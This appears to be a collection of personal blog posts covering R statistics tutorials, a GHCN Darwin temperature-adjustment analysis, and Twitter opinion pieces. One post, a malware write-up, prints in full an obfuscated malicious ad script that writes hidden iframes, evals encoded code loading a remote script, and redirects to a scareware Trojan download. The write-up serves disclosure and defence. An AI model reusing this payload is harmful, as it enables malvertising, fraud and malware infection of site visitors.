Cochran-Armitage Test for Trend with R

Suppose, for a set of entities randomly sampled from a population, you record observations about two variable features of each entity. Furthermore, suppose that one of these variables can take on two levels, or values, and the other can take on k levels. Given such categorical data, you may wonder if there exists an association between the two variables. In order to answer this question, you could use a chi-square test. This test is appropriate in most situations; however, if the k levels of your second variable have a natural ordering, and you suspect that this ordering has an effect on the first variable, you might want to use the Cochran-Armitage test.

Perhaps the best way to understand the Cochran-Armitage test is through an example. Below is a 2 x k contingency table, where k=4, that shows screening mammography attendance by time since last visit to a general practitioner for N=278 patients:1

Table 1. Screening mammography attendance by time since last visit.
  Time since Last Visit
Attendance  <6 mo.   6-12 mo.   1-2 yr.   >2 yr. 
No 97 31 36 28
Yes 59 10 12 5

From this table it is easy to speculate that the proportion of patients attending screening mammography decreases as time since their last office visit increases. The putative linear trend is best visualized via the following conditional relative frequencies:

Table 2. Proportion attending screening mammography by time since last visit.
  Time since Last Visit
Attendance  <6 mo.   6-12 mo.   1-2 yr.   >2 yr. 
No 0.622 0.756 0.750 0.848
Yes 0.378 0.244 0.250 0.152

Now all that is left to do is test for a linear trend in proportions. Using R, a statistical programming language,2 this is done as follows:

#
# Create patient observations.
#
patient.data <- data.frame(
    Attendance=factor(c(rep("No", 192), rep("Yes", 86))),
    Last.Visit=ordered(c(
        rep("<6 mo", 97), rep("6-12 mo", 31), rep("1-2 yr", 36), rep(">2 yr", 28),
        rep("<6 mo", 59), rep("6-12 mo", 10), rep("1-2 yr", 12), rep(">2 yr", 5)),
        levels=c("<6 mo", "6-12 mo", "1-2 yr", ">2 yr")))
#
# Make a contingency table just like Table 1.
#
table.1 <- table(patient.data)
print(table.1)
#
# Do a Cochran-Armitage test for a linear trend in proportions.
#
prop.trend.test(
    x=table.1["Yes", ],
    n=margin.table(table.1, margin=2), # sum by column
    score=c(3, 2, 1, 0))

Running the R code reveals that the observed linear trend is unlikely to be due to chance alone (P=0.004).

One nice thing about the Cochran-Armitage test is that it can be tuned to detect different types of trends. In R, tuning is done by setting the score parameter of the prop.trend.test() function. For instance, score=c(0, 1, 1, 0) would be suitable for detecting a non-monotonic, umbrella-shaped trend. The score parameter is also useful when analyzing a disease-by-genotype table since it allows one to test for an allele's mode of inheritance (e.g. dominant, co-dominant, or recessive).

In general, the Cochran-Armitage test is preferable to the chi-square test when dealing with a suspected trend because it has more power to detect said trend if it exists. The Cochran-Armitage test's additional power arises from the fact that, unlike the chi-square test, it is not sensitive to all departures from a null hypothesis of equal proportions. Thus, be aware that it is possible for the Cochran-Armitage test to miss an association between two variables.


  1. Armitage, P., Berry, G., & Matthews, J. N. S. (2002). Statistical Methods in Medical Research (4th ed.). Oxford: Blackwell Science. See p. 506.
  2. R Development Core Team. (2008). R: A language and environment for statistical computing. Vienna, Austria: R Foundation for Statistical Computing.

If Twitter wants Annotations to succeed...

...then it must act like Apple, Inc. That is, it must exercise control over its ecosystem. Just as Apple is in charge of the iPhone's hardware, operating system, and App Store, so must Twitter control the vocabulary for annotating Tweets. Without control there is discord, and discord prevents software interoperability. Discord is the reason why web application mashups are complex and brittle. Discord is also the reason why the Semantic Web remains more of a theoretical construct than a functioning system. The biblical story of the Tower of Babel is relevant here since it describes how a people's unity of purpose is lost when they can no longer communicate.1 The Lord may work in mysterious ways, but Twitter should not. It is irrational for Twitter to intentionally leave its ecosystem developers without a controlled vocabulary.

One might be sympathetic to Twitter's proposal to "let a hundred flowers blossom"2 and hundreds of vocabularies develop if such an approach worked. However, open efforts at formulating metadata schemes, starting with RDF ontologies (1999),3 extending to Microformats (2004),4 and culminating in start-ups like Freebase (2005),5 have yet to pay off. After a decade of experimentation there is a plethora of metadata schemes, but a paucity of software applications making use of these schemes. In many ways, this outcome may have been unavoidable.6

So, pushing the hard work of vocabulary development onto developers and thinking that, somehow, magically, they will coalesce around common terms is a demonstrably false belief. Still, there are existing RDF ontologies and Microformats capable of partially describing many of the things one might want to Tweet about during the course of a day. It seems wasteful to ignore this past work or leave its potential adoption to the whims of competing ecosystem developers. At this point in time, Twitter needs to step in and add some value. It needs to take control. It needs to extract ideas from existing metadata schemes, assimilate these ideas into a simple controlled vocabulary, publish this vocabulary, and enforce its exclusive use when Annotations are transmitted over the Twitter platform.


  1. Genesis 11:1-9.
  2. A slogan used by Chairman Mao Zedong to encourage Chinese intellectuals outside of the Communist Party to contribute ideas on how the government could promote progress in the arts and sciences. Many of these intellectuals were later executed.
  3. Tauberer, J. (2006-07-26). What Is RDF. O'Reilly XML.com.
  4. Microformat FAQs relating to RDF. (2009-08-22). Microformats Wiki.
  5. Freebase CrunchBase Profile. (2009-03-30). CrunchBase.
  6. Doctorow, C. (2001-08-26). Metacrap: Putting the torch to seven straw-men of the meta-utopia. Personal blog.

Darwin Airport Temperature Data in Context

(download)

Previously, I attempted to recreate Willis Eschenbach's analysis of Darwin, Australia's historical temperature record.1 This recreation confirmed that a slight cooling trend in Darwin's combined temperature record became a pronounced warming trend after the Global Historical Climate Network (GHCN) statistically adjusted a subset of Darwin's individual records. What was left unanswered was whether such adjustments, originally intended to control for changes in land use and measurement practices, were, en masse, introducing or inflating a global warming trend.

In order to quantify the impact of the aforementioned adjustments, I analyze trends in temperature records taken from thousands of weather stations. More specifically, I examine the change in each record's trend due to the GHCN's adjustment process. I then use the results to place the adjustments made to Darwin's temperature records in context. As usual, I rely on R, a statistical programming language, for its ability to automate statistical operations. Follow along, step-by-step, and draw your own conclusions about the GHCN's adjustment process.

Computing the Trends

We begin our analysis with the assumption that raw and adjusted datasets, each containing yearly GHCN mean temperature data, have already been loaded into R.2 Next, we define a function capable of computing a trend for each temperature record present within a specified dataset.

> ComputeTrendsByRecord <- function(data) {
    # Returns a dataset containing the linear trend of each temperature
    # record in the input dataset.
    #
    # data: A dataset containing yearly GHCN mean temperature data.
    #
    trend.data <- data.frame(Id=character(), Rec=factor(), Trend=numeric(),
        Length=numeric())
    for (station.id in unique(data$Id)) {
        station.data <- subset(data, Id == station.id)
        station.recs <- split(station.data, f=station.data$Rec, drop=TRUE)
        for (rec in station.recs) {
            y <- ts(rec$MeanTemp, start=rec[1, "Year"])
            x <- time(y)
            b <- coef(lm(y ~ x))["x"]
            names(b) <- NULL
            trend.data <- rbind(trend.data,
                data.frame(Id=station.id, Rec=rec[1, "Rec"], Trend=b,
                    Length=length(y)))
        }
    }
    return(trend.data)
}

Once the above function is defined, we start computing trends.

> raw.trend.data <- ComputeTrendsByRecord(raw.data)
> adj.trend.data <- ComputeTrendsByRecord(adj.data)

With R's system.time() function, we can measure how long it takes to compute the trends. Doing so leads to the realization that computing thousands of linear regressions is very resource intensive. For instance, on an AMD Turion64 ML-32 CPU at 1.8 GHz with 384 MB system RAM running Ubuntu 8.04 it takes an elapsed time of 40 minutes to compute the raw trends and 18 minutes to compute the adjusted trends. It is faster to compute the adjusted trends because every temperature record has a raw version, but not every record has a corresponding adjusted version.3 Our aim now is to pair the trends by record via a merge.

> paired.trend.data <- merge(raw.trend.data, adj.trend.data,
    by=c("Id", "Rec"))

The head() function gives us a glimpse of what the resultant dataset looks like, for example:

> head(paired.trend.data)
           Id Rec      Trend.x Length.x      Trend.y Length.y
1 10160390000   0 -0.001393259      119  0.015645415      119
2 10160390000   1  0.013603567       64  0.043426557       64
3 10160390000   2  0.021083753       56 -0.006408558       56
4 10160390000   3  0.013808714       42  0.026670411       42
5 10160395001   0  0.038976221       56 -0.001259622       56
6 10160419000   0 -0.018078076       49 -0.018078076       49

Here, columns with .x and .y suffixes denote temperature record attributes calculated on raw and adjusted data, respectively. Our last manipulation is to add a new column that captures how much each record's trend has changed going from a pre-adjusted state to a post-adjusted state.

> paired.trend.data$DeltaTrend <- (paired.trend.data$Trend.y -
    paired.trend.data$Trend.x) * 10 # degC/decade

It should be noted that each change (delta) in trend is multiplied by a factor of 10 so that it is expressed in degrees Celsius per decade. Finally, our approach to computing trends is obviously inefficient. For instance, we expend a lot of wasted effort calculating trends for raw temperature records that have no corresponding adjusted version. Improving the code is left as an exercise for the reader.

Graphing the Trends

The best way to visualize the deltas that we have just calculated is via a histogram.

> hist(paired.trend.data$DeltaTrend,
    las=1,
    main=paste("Histogram of Changes in the Trends of",
        nrow(paired.trend.data), "Records\n",
        "due to the GHCN's Adjustment Process"),
    nclass=200,
    xlab="Degrees Celsius per Decade")

Our histogram is not complete, though. We need to draw a series of vertical lines through it, each line marking the location of a delta associated with one of Darwin Airport's temperature records. At this point, it is important to remember that Darwin Airport's station identifier is "50194120000".

> darwin.paired.trend.data <- subset(paired.trend.data,
    Id == "50194120000")
> abline(v=darwin.paired.trend.data$DeltaTrend,
    col=c("blue", "purple", "red"))
> legend("right",
    fill=c("blue", "purple", "red"),
    inset=0.1,
    legend=darwin.paired.trend.data$Rec,
    title="Darwin Record")

The final product is shown in Fig. 1 above.

Results

From Fig. 1, it is clear that the change in the trend of Darwin Record Zero (blue), Eschenbach's "smoking gun",4 is extreme; however, it is not extremal. There are 574 records with deltas greater than Darwin Record Zero, including Darwin Record Two (red). There are also 453 records that have had their trends adjusted downward more than Darwin Record Zero has had its trend adjusted upward. Of the 6,736 deltas calculated, 3,317 are greater than zero and 2,574 are less than zero. There is evidence that this difference is not due to chance alone (sign test, P<0.001).5 The mean change in trend is +0.017°C per decade (t-test, P<0.001).6 The mean change in trend weighted by record length in years is +0.018°C per decade. Finally, Darwin's temperature records are summarized as follows:

Darwin's Deterministic Trends (°C/dec)
Record Raw Adjusted Delta Years
0 -0.07150741 0.163448332 0.23495574 110
1 0.02683280 0.004114076 -0.02271872 69
2 0.15437369 0.414611679 0.26023798 42
3 0.31134085 NA NA 20
4 -0.41069865 NA NA 9

Our results replicate those found elsewhere.7, 8

An Optimistic Interpretation

An optimistic interpretation of our results is that no "smoking gun" exits. In other words, even if the adjustments to Darwin Record Zero seem bizarre, the fact is that "most adjustment[s] hardly modify the reading, and the warming and cooling adjustments end up compensating each other."9 Furthermore, the whole point of the GHCN's adjustment process is to eliminate biases in the temperature data. In this regard, the mean change in trend of +0.017°C per decade is a sign that the GHCN's adjustment process is doing what it is supposed to do: separate the signal of global warming from the noise of local, non-climatic effects.

A Skeptical Interpretation

A skeptical interpretation of our results is that the GHCN's adjustment process is not just offsetting existing biases, but creating new ones. Thus, the "smoking gun" is not the upward adjustment of Darwin Record Zero's temperature trend but the incongruous treatment of Darwin Record One and Darwin Record Two. As shown in Fig. 2, the raw version of Darwin Record Two (red) is practically a subsequence of Darwin Record One (purple). Yet, after going through the GHCN's adjustment process, the two records barely overlap. If the purpose of the GHCN's adjustment process is to correct for local changes affecting a temperature station, then, in the absence of any station metadata to the contrary, similar records should be adjusted similarly. Moreover, an effect size of +0.017°C per decade is not insignificant as it represents 31% of the +0.054°C per decade global temperature trend from 1850-2005.10

Errata

In working with the GHCN Version 2 database, I came across the following problems:

Gaps/Deletions
Some temperature records have gaps in which whole years are missing. Arguably, when such a gap is present, the offending record should probably be split into two separate records. Also, it should be noted that gaps subvert R's time series facilities since time series objects are supposed to represent observations over consecutive years.
Insertions/Repetitions
Some adjusted temperature records have extraneous observations that do not appear in their corresponding raw versions. See records from stations "30187860001", "40371826000", "40878662001", "41476726000", and "80099910001" for more details.

  1. Markus, M. (2010-01-12). Darwin Airport Temperature Data Revisited. Personal blog.
  2. Markus, M. (2010-01-12). See the section on "The Data Reloaded".
  3. This statement should be true; however, it appears that Kuwait International Airport (i.e. "21240582000") has a ghost. That is, there is a temperature record, Record Three to be exact, for which there is an adjusted version but no original version.
  4. Eschenbach, W. (2009-12-08). The Smoking Gun At Darwin Zero. Watts Up With That?
  5. Whitely, E., & Ball, J. (2002). Statistics review 6: Nonparametric methods. Critical Care, 6, 509-513. [PMID: 12493072]. Here we use a nonparametric sign test (with zeros discarded) lest someone accuse us of completely ignoring the distribution's deviation from normality. In R, use the binom.test() function.
  6. Conducting a Student's t-Test is reasonable given the paired nature of the data, the relative symmetry of the distribution, and the large sample size. In R, use the t.test() function.
  7. Gilestro, G. (2009-12-12). Lots of smoke, hardly any gun. Do climatologists falsify data? Personal blog. See also the accompanying results.txt file.
  8. Stokes, N. (2009-12-21). Darwin and GHCN Adjustments. Moyhu.
  9. Gilestro, G. (2009-12-12).
  10. Trenberth, K. E., et al. (2007). Observations: Surface and Atmospheric Climate Change. In S. Solomon, et al. (Eds.), IPCC Fourth Assessment Report (pp. 235-336). New York: Cambridge University Press. See Table 3.2 on p. 243.

Darwin Airport Temperature Data Revisited

 

(download)

Climatological organizations often statistically adjust temperature records in order to offset local, non-climatic effects. Herein, I use R, a statistical programming language, to recreate Willis Eschenbach's analysis of some questionable adjustments made to the historical temperature record of Darwin, Australia by the Global Historical Climate Network (GHCN).1 This post builds upon my previous work with the GHCN Version 2 database;2 however, I have tried to make it relatively self-contained so that one can proceed without too much backtracking.

The Data Reloaded

Assuming that we have the relevant temperature data files (i.e. v2.mean and v2.mean_adj) in our working directory,3 we begin a new R session. Next, we copy and paste the following function into the R environment:

> LoadGHCN <- function(filename, na.rm=FALSE) {
    # Returns a dataset containing yearly GHCN mean temperature data.
    #
    # filename: The name of a file containing monthly GHCN mean
    #           temperature data.
    #    na.rm: Strip missing values before calculating yearly means?
    #   
    months <- c("Jan", "Feb", "Mar", "Apr", "May", "Jun", "Jul", "Aug", "Sep",
        "Oct", "Nov", "Dec")
    colw <- c(11, 1, 4, rep(5, 12))
    coln <- c("Id", "Rec", "Year", months)
    colc <- c("character", "factor", "numeric", rep("numeric", 12))
    data <- read.fwf(filename, colw, col.names=coln, na.strings="-9999",
        colClasses=colc)
    data$MeanTemp <- rowMeans(data[months], na.rm=na.rm)/10 # Celsius
    return(data[c("Id", "Rec", "Year", "MeanTemp")])
}

This function is just some refactored code taken from my previous post on Darwin and put into a reusable form. It is designed to read monthly GHCN mean temperature data from a file and transform said data into a more utilitarian representation. One important aspect of this function is that it allows one to specify, via the na.rm parameter, how missing monthly values should be handled when computing each yearly mean. Normally, in statistical programming languages like R and SAS, a calculation on a missing value (i.e. NA) results in a missing value. Such a conservative approach is usually desired. In our case, though, such an approach is too conservative since the monthly GHCN mean temperature data is interspersed with missing values. Thus, we load the raw and adjusted temperature data like so:

> raw.data <- LoadGHCN("v2.mean", na.rm=TRUE)
> adj.data <- LoadGHCN("v2.mean_adj", na.rm=TRUE)

It should be noted that there are more intelligent ways to handle missing values. For instance, one could use the complete.cases() function to determine the pattern of missing values per row. One could then opt to assign a missing value to a yearly mean if the row of monthly temperature values upon which it is based contains a sequence of missing values. Improving the LoadGHCN() function is left as an exercise for the reader.

Eschenbach's Darwin

Willis Eschenbach, a climate change skeptic, has created a plot, shown in Fig. 1 above, that depicts the effects of GHCN adjustments to Darwin Airport's combined temperature record.4 Our goal is to use R to recreate this plot. The first obstacle we encounter is the fact that there are several distinct temperature records for Darwin Airport. More specifically, Darwin's raw temperature data consists of five records, three of which are present in homogenized form in its adjusted dataset. We need to compute an average temperature record for Darwin on a per dataset basis. To help us do this, we define the following function:

> AverageTemperatureRecords <- function(data, station.id) {
    # Returns a time series that is the average of all of the temperature
    # records for the given temperature station.
    #
    #       data: A dataset containing yearly GHCN mean temperature data.
    # station.id: An eleven-character temperature station identifier.
    #
    station.data <- subset(data, Id == station.id)
    station.recs <- split(station.data, f=station.data$Rec, drop=TRUE)
    station.ts <- NULL
    for (rec in station.recs) {
        station.ts <- ts.union(station.ts,
            ts(rec$MeanTemp, start=rec[1, "Year"]))
    }
    if (!is.null(dim(station.ts))) {
        station.ts <- ts(rowMeans(station.ts, na.rm=TRUE),
            start=start(station.ts))
    }
    return(station.ts)
}

Now, recalling that Darwin Airport's station identifier is "50194120000", we average the temperature records in each dataset to create two separate time series.

> raw.darwin.ts <- AverageTemperatureRecords(raw.data, "50194120000")
> adj.darwin.ts <- AverageTemperatureRecords(adj.data, "50194120000")

The next problem we must overcome is that the temperature time series in Fig. 1 are presented in terms of temperature anomalies. Temperature anomalies are departures from a common baseline. In climatology, the baseline is usually a global mean temperature calculated over some localized time period (e.g. 1971–2000).5 Nevertheless, in Fig. 1, the time series are normalized with respect to two different baselines so that they both can start from zero. Eschenbach claims that this is done to highlight the effect of the adjustments.

> eschenbach.raw.ts <- raw.darwin.ts - raw.darwin.ts[1]
> eschenbach.adj.ts <- adj.darwin.ts - adj.darwin.ts[1]

Once we have the normalized time series, we can plot them.

> ts.plot(eschenbach.adj.ts, eschenbach.raw.ts,
    col=c("red", "blue"),
    gpars=list(pch=20),
    main="GHCN Raw & Adj Temperatures Darwin Airport",
    type="o",
    ylab="Temperature Anomaly (C)")

The result forms the foundation of Fig. 2 above. We are not done yet, though. We need to add trend lines. To start, we use the lm() function to fit a straight-line model to each time series. In other words, we are just doing some simple linear regressions with time as the independent variable and temperature anomaly as the dependent variable. Note that the lm() function's na.action parameter must be set to NULL to ensure that a regression's residuals and fitted values are returned as time series.

> eschenbach.raw.reg <- lm(eschenbach.raw.ts ~ time(eschenbach.raw.ts),
    na.action=NULL)
> eschenbach.adj.reg <- lm(eschenbach.adj.ts ~ time(eschenbach.adj.ts),
    na.action=NULL)

Using the coef() function on the output of the first regression, we get an estimated slope for the straight-line model of -0.007124129, which translates into a cooling of 0.007° C per year or 0.7° C per century. This agrees with the trend that Eschenbach reports for the raw temperature time series in Fig. 1. The second regression yields an estimated slope of 0.01905713, indicative of a 1.9° C per century warming. Eschenbach, on the other hand, reports a 1.2° C per century warming for the adjusted temperature time series in Fig. 1. Despite this discrepancy, we plot the regressions' fitted values so as to produce the trend lines shown in Fig. 2.

> lines(fitted(eschenbach.adj.reg), col="red")
> lines(fitted(eschenbach.raw.reg), col="blue")

The last thing we have to do is overlay the amount of adjustment.

> lines((eschenbach.adj.ts - eschenbach.raw.ts), col="black")

We finally have Fig. 2, which looks very similar to Fig. 1, Eschenbach's original plot. The biggest difference between the two figures is the fact that, in Fig. 1, the black line tracking the amount of adjustment is plotted against a scale on the right-hand side. One gripe is that Eschenbach should have calculated the amount of adjustment as (adj.darwin.ts - raw.darwin.ts). We can confirm this by looking at Fig. 3, a plot of the original time series, which shows us that the adjusted time series starts off 2.34° C below the raw time series and that the series eventually converge.

A Smoking Gun?

So, are the GHCN's adjustments inappropriately introducing or inflating a global warming trend? Is Darwin a smoking gun? The climate change skeptic may view the adjustments made to Darwin with some suspicion. Yet, there really is no way to contextualize the adjustments made to Darwin without looking at other temperature stations.


  1. Eschenbach, W. (2009-12-08). The Smoking Gun At Darwin Zero. Watts Up With That?
  2. Markus, M. (2009-12-23). Raw Darwin Airport Temperature Data with R. Personal blog.
  3. Markus, M. (2009-12-23). See the section on "Getting the Data".
  4. Eschenbach, W. (2009-12-08). Figure 7.
  5. Global Surface Temperature Anomalies. (2009-12-11). NOAA.

Raw Darwin Airport Temperature Data with R

 

(download)

Traditionally, I have done statistical analyses using SAS. SAS provides an analyst with a pretty good environment; however, the system is expensive and programming via the SAS Macro Language leaves much to be desired. R, a freely available statistical programming language, is the open source response to SAS. Up until now, I have not done much programming in R. One reason for my lack of programming in R is that I don't have any interesting data to analyze. Forutnately, a series of tit-for-tat blog posts1,2,3,4 discussing the temperature record for Australia's Darwin Airport has changed this situation. My goal here is to use R to recreate Fig. 1,5 as shown above. I hope that you will follow along.

Getting the Data

First, we need to get the temperature record for Darwin Aiport. This data is contained in the Global Historical Climate Network (GHCN) Version 2 database, which is available for download from the National Climatic Data Center (NCDC). According to the NCDC, the GHCN database "contains historical temperature, precipitation, and pressure data for thousands of land stations worldwide."6 Since we are just interested in the temperature data, all we have to do is download the following files:

v2.mean.Z
A compressed file containing monthly mean station temperatures.
v2.mean_adj.Z
A compressed file containing monthly mean station temperatures statistically adjusted to offset "nonclimatic discontinuities" such as changes in instrument shelters or local station environments.
v2.temperature.inv
An inventory file containing station metadata.

It should be noted that I downloaded all of the above files on December 18th, 2009.

Preparing the Data

Now that we have the temperature data, we need to uncompress it. On UNIX, this can be done using the uncompress command.

> uncompress v2.mean.Z
> uncompress v2.mean_adj.Z

After uncompressing the files, each file should be larger and no longer have the ".Z" ending. Next, we need to find the identifier for the Darwin Airport station by searching the inventory file using the grep command.

> grep "DARWIN" v2.temperature.inv
50194120000 DARWIN AIRPOR                  -12.40  130.87   30   17U   56FLxxCO 3A 1WATER           C

Here, the identifier is the eleven-digit number at the beginning of the row (i.e. "50194120000"). It consists of a country code (3 digits), station number (5 digits), and a modifier (3 digits). We can also confirm that we have the correct station by noting that the Darwin Airport is indeed located at 12°40'S latitude and 130°87'E longitude.

Loading the Data into R

Once we have the station identifier, we can start up our R environment7 and then load the raw temperature data from the v2.mean file into it via the read.fwf command. We can learn more about that command, or any other R command, by prefixing it with a question mark.

> ?read.fwf

Since the v2.mean file has a fixed-width format, we must specify the width, name, and class of each of its columns. Additionally, we need to tell R that missing monthly temperature values are coded as -9999.

> months <- c("Jan", "Feb", "Mar", "Apr", "May", "Jun", "Jul", "Aug", "Sep",
    "Oct", "Nov", "Dec")
> colw <- c(11, 1, 4, rep(5, 12))
> coln <- c("Id", "Rec", "Year", months)
> colc <- c("character", "factor", "numeric", rep("numeric", 12))
> raw <- read.fwf("v2.mean", colw, col.names=coln, na.strings="-9999",
    colClasses=colc)

It may take awhile for R to load all of the data. After R finishes loading the data, we can use the summary and attributes commands to verify that the data was loaded correctly. R reports that the dataset that I am using has 595,759 rows.

Plotting the Data

Before we can actually plot the raw Darwin Airport temperature data, we must first calculate yearly mean station temperatures. We can accomplish this by using the rowMeans command to average all of the monthly temperatures on a per row (i.e. year) basis. It should be noted that each row mean is divided by a factor of 10 in order to convert it into degrees Celsius.

> raw$RawMeanTemp <- rowMeans(raw[, months], na.rm=TRUE)/10
> raw.globe <- raw[, c("Id", "Rec", "Year", "RawMeanTemp")]

Next, we must subset out the temperature data for Darwin Airport, split this data into the five individual records that make up the overall Darwin Airport temperature record, and create time series8 out of each these records.

> raw.darwin <- subset(raw.globe, Id == "50194120000")
> raw.darwin.recs <- split(raw.darwin, f=raw.darwin[, "Rec"], drop=TRUE)
> for (i in 1:length(raw.darwin.recs)) {
    varname <- paste("rec", i, sep=".")
    assign(varname, ts(raw.darwin.recs[[i]][, "RawMeanTemp"],
        start=raw.darwin.recs[[i]][1, "Year"]))
}

Finally, all that's left for us to do is to plot the time series.

> ts.plot(rec.1, rec.2, rec.3, rec.4, rec.5,
    col=c("blue", "purple", "red", "pink", "lightblue"),
    main="Fig.2 - Five Raw Darwin Temperature Records from GHCN",
    type="o",
    ylab="Temp (C)")

The result is shown in Fig. 2 above. It's not pretty, but it looks like it agrees with Fig. 1 and it should provide us with a good starting point for future analyses.


  1. Eschenbach, W. (2009-12-08). The Smoking Gun At Darwin Zero. Watts Up With That?
  2. Scepticism's limits. (2009-12-11). The Economist.
  3. Eschenbach, W. (2009-12-12). Willis: Reply to the Economist. Watts Up With That?
  4. Climate manipulation gun still notably smoke-free. (2009-12-14). The Economist.
  5. Eschenbach (2009-12-08). Figure 5.
  6. GHCN-Monthly Version 2. (2008-08-20). NOAA.
  7. R version 2.6.2 (2008-02-08). On Ubuntu, you can install R via the apt-get utility. You will want to install the r-base and r-base-dev packages.
  8. Shumway, R. H., & Stoffer, D. S. (2006). An R Time Series Tutorial. For, Time Series Analysis and Its Applications: With R Examples (2nd Ed.). New York: Springer-Verlag.

Anatomy of a Fraud

Now that I have a blog, I can document some of the malware that I come across. The impetus behind this post is a retweeted link to a NewScientist story entitled "Genome firm shoots itself in the foot."

The problem starts with the fact that the NewScientist uses ADTECH to serve banner ads via some JavaScript magic. The way the JavaScript magic works is as follows:

  1. A NewScientist web page requests JavaScript from an ADTECH server.
  2. The ADTECH server responds with a JavaScript that contains a request for another JavaScript from a 3rd party server.
  3. Periodically, "farmingtoncp.com" is the 3rd party server from which the ultimate JavaScript is requested.

The problem with "farmingtoncp.com" is that it occasionally delivers the following JavaScript:

document.write(unescape("%3Ca href='http%3A%2F%2Fjetblue.com%2F%3F%3D3468' target='_blank'%3E%3Cimg src='http://farmingtoncp.com/bdb/Jetblue/728x90_upd.jpg' border='0' %3E%3C/a%3E")); statictml = (new Date(new Date().getFullYear(), 0, 1, 0, 0, 0, 0) - new Date(new Date(new Date().getFullYear(), 0, 1, 0, 0, 0, 0).toGMTString().substring(0, new Date(new Date().getFullYear(), 0, 1, 0, 0, 0, 0).toGMTString().lastIndexOf(" ")-1))) / (1000 * 60 * 60); var cd1 = "ine"; var cd2 = "rsard.co"; var cd3 = "m"; var cur_domain = cd1 + cd2 + cd3; var all_t = "-10,-9,-8,-7,-6,-5,-4,-3,-1,0,1"; var mtch = all_t.match(statictml); if ( mtch == null ) { document.write(unescape("%3Ciframe src='http://"+cur_domain+"/stats_t.php?id=191959845&s=1&e=0' style='visibility:hidden;' width='0' height='0' %3E%3C/iframe%3E")); } else { var abc = "http://nokian-d"; var def = "iscounts.cn/go.php?i"; var klm = "d=2006-51&key=0522c7066&d=1"; var action_URL = abc + def + klm; eval(unescape('%64%6F%63%75%6D%65%6E%74%2E%77%72%69%74%65%28%75%6E%65%73%63%61%70%65%28%22%25%33%43%73%63%72%69%70%74%20%73%72%63%3D%27%68%74%74%70%3A%2F%2F%22%20%2B%20%63%75%72%5F%64%6F%6D%61%69%6E%20%2B%20%22%2F%69%6E%63%6C%75%64%65%73%30%32%2E%6A%73%27%20%74%79%70%65%3D%27%74%65%78%74%2F%6A%61%76%61%73%63%72%69%70%74%27%25%33%45%25%33%43%2F%73%63%72%69%70%74%25%33%45%22%29%29%3B')); } //!mtch

This JavaScript may look complex, but it is really quite simple. Its mission is two-fold. First, it sets up a banner ad for JetBlue Airways. If one clicks on the ad, the fraudsters earn a commission via JetBlue's affiliate program run by Commission Junction. The offending JetBlue URL containing the affiliate code is as follows:

http://jetblue.com/?=3468

Secondly, the JavaScript contacts a server at "inersard.com" in order to trigger a redirect to an action_URL, which, in this case, points to a server at the "nokian-discounts.cn" domain name.

From a user's perspective, all of the above happens in an instant so that the page at the NewScientist is bypassed and, in its place, one gets a scary page that declares that "your PC needs to install antimalware software! Antivir can perform fast and free scan of your computer." Unfortunately, if one downloads this antimalware software, one gets a 184,320 byte .exe file (MD5: 800dae61b734f31c9dab82cbd4135594) from "n6-scanner.com" that is really a Trojan horse known as Trojan.Agent.180224.

As you can see, these kinds of scams involve several entities, including many legitimate businesses. Such complexity makes halting Internet-based fraud almost impossible. Still, I hope that this is the last time that I have to deal with malware being delivered over an ad network.

Addendum

The (presumably fake) WHOIS information for each of the sites listed above:

Kelly Lattimore dns@farmingtoncp.com
618-329-3335 fax: 618-329-3335
273 Eagle Street
Oakdale IL 62268
us

DNS:
ns1.everydns.net
ns2.everydns.net

Created: 2009-12-02
Expires: 2010-12-02

Steve Garcia admin@inersard.com
218-597-0073 fax: 218-597-0073
1427 Terra Cotta St
Strandquist MN 56758
us

DNS:
ns1.everydns.net
ns2.everydns.net

Created: 2009-12-21
Expires: 2010-12-21

Domain Name: nokian-discounts.cn
ROID: 20091213s10001s02831682-cn
Domain Status: clientTransferProhibited
Administrative Email: jeya32jay@live.co.uk
Name Server:ns1.everydns.net
Name Server:ns2.everydns.net
Name Server:ns3.everydns.net
Name Server:ns4.everydns.net
Registration Date: 2009-12-13 21:36
Expiration Date: 2010-12-13 21:36

Domain Name: n6-scanner.com
Henry Nguyen Gong contact@privacy-protect.cn
+33.0466583875 fax: +33.0466583875
Rue la produit 34
Nimes Languedoc-Roussillon 30189
fr

DNS:
ns1.everydns.net
ns2.everydns.net
ns3.everydns.net
ns4.everydns.net

Created: 2009-12-20
Expires: 2010-12-20

Don't #SaveReTweets, Revolutionize Them

Twitter is in the process of formalizing an emergent convention known as the retweet. For those unfamiliar with this convention, one could view it as a way of quoting a message (i.e. tweet) to all of one's followers. So, if one wants to retweet a tweet (e.g. "I just saw a meteor!"), one can do so by copying it and then referencing the original author (e.g. "matthewmarkus") via the retweet syntax, like so:

RT @matthewmarkus I just saw a meteor!

Now, the "RT @matthewmarkus" portion of the aforementioned retweet is what is known as metadata. That is, it is data about data or, more specifically, data about the original tweet. Twitter's goal in formalizing the retweet is to separate this metadata from the original data so that computers can readily process it, thereby making retweets more searchable and trackable. Unfortunately, there is a group of individuals, let's call them the Twitter Conservatives, that are trying to halt Twitter's formalization of the retweet.

The Twitter Conservatives, led by viral marketing scientist Dan Zarrella (@danzarrella) and supported by individuals such as my friend Michael Weiksner (@weiks), want to conserve the original retweet syntax and keep metadata intermingled with data. In order to publicize their efforts, they are gathering under the #SaveReTweets hashtag on Twitter. As near as I can tell, the Twitter Conservatives' objections to Twitter's formalization of the retweet are as follows:

  1. The formalized retweet system does not allow one to add a comment to a retweet. That is, under the new rubric, one cannot formulate a message equivalent to:
    Me too! RT @matthewmarkus I just saw a meteor!
  2. The formalized retweet system obscures the identity of a retweeter and, thereby, hinders his/her ability to lend credibility to the tweets that he/she retweets.
  3. The formalized retweet system eliminates a commonly understood format for retweeting that is utilized across Twitter clients.
  4. Formalizing retweets by separating metadata from data violates the KISS (Keep It Simple, Stupid) Principle.

These objections, though, are easily rebutted:

  1. Twitter's formalization of a retweet as a pointer to, or, alternatively, as a verbatim copy of, an original tweet is a step forward since it prevents spammers and crackers from producing retweets containing spammy or malicious links. Furthermore, Twitter's formalization highlights the difference between quoting something and commenting on something. Commenting on resources should be done via the formalized @replies convention or the yet-to-be-formalized RE microsyntax.
  2. The idea that Twitter's formalized retweet system obscures the identity of a retweeter is a red herring. In fact, the new system explicitly captures the identity of a retweeter and allows developers to perfect the display of retweets. For a given retweet, an innovative Twitter client could even show the avatar of the author of the original tweet along with the avatar of the retweeter.
